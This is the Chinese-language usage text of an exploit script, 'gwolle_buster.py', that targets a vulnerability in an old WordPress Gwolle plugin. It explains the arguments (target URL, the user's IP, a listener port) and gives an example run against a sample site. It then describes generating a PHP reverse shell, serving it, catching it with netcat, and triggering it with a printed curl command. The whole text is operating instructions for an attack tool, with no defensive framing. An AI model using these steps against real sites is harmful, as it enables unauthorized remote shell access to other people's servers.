此脚本用于利用 WordPress 旧版插件 gwolle 的漏洞
使用方法:
./gwolle_buster.py <目标URL> <本地IP> <本地端口>
第一个参数 <目标URL> => 安装了 gwolle 的 WordPress 目标 URL
第二个参数 <本地IP> => 你的 IP
第三个参数 <本地端口> => 用于反向 shell 的监听端口
示例: ./gwolle_buster.py http://vulnpress.com/ 192.168.1.5 1234
此脚本将生成 PHP 反向 shell 脚本并绑定简易服务器,
因此你需要在第一个终端打开两个新终端并监听 netcat,然后使用 curl 命令发起请求,
命令会自动生成并显示在控制台,
因此你可以轻松复制粘贴